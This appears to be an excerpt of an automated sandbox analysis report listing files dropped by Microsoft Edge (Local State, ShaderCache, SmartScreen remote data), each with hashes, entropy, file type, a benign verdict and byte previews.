                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37744.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6820
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.794169434176394
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaqkHfx/T0j85ih/cI9URLl8RotoDMFVvlwhee4IbONIeTC6XQS0qGqk+Z4uj+rE:akJ/YeiRUwhe6qRAq1k8SPxVLZ7VTi3
                                                                                                                                                                                                                                                                                                MD5:48F6EF5330D255411DDEEFDD943F4CE3
                                                                                                                                                                                                                                                                                                SHA1:2652A28B2AA93BD45EDCCE7A90157BA8CB72BBBD
                                                                                                                                                                                                                                                                                                SHA-256:9B342D917BE8FC1AA2A9137599F1E73896319F57DE1E960E0794D643F39A0DB6
                                                                                                                                                                                                                                                                                                SHA-512:8973E0FEFFE6381B7CC4B7C946C71F853D2DBD2EA5AC1DEA469D0EFAEDF651AF80E69BBD48BA35D2E7709474807733695E8E52BFA784F50239A7C6F2607FF72D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAoNWoc+tUySZlhby90pfVDEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADDvWRDgOwoQ/z9PYsA513BMrO9Th/z3oxvLJRn567cvwAAAAA

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                                MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):262512
                                                                                                                                                                                                                                                                                                Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:LsNluS6lt:Ls3u1
                                                                                                                                                                                                                                                                                                MD5:46D6D406F7C5A60680BB634C566597D3
                                                                                                                                                                                                                                                                                                SHA1:5DA54072C7DDBF13105960A5412425DA5415E147
                                                                                                                                                                                                                                                                                                SHA-256:00F696635622C97FF6C860FB3D454B4A2A9239A407578481334262977AD2120E
                                                                                                                                                                                                                                                                                                SHA-512:A95AF5ED0BDBFBA40C127F97328B6D3C03095A62D62506139C8882DC17F45A99911C7E4F782987D13DB1C539F350AA3B63F0A59EE8C1483454021AA0BA604C17
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:........................................4..s./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                                MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                                SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                                                                                                SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                                SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:customSynchronousLookupUris_0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35302
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3581
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                                MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                                SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                                SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                                SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):35302
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                Malicious:false
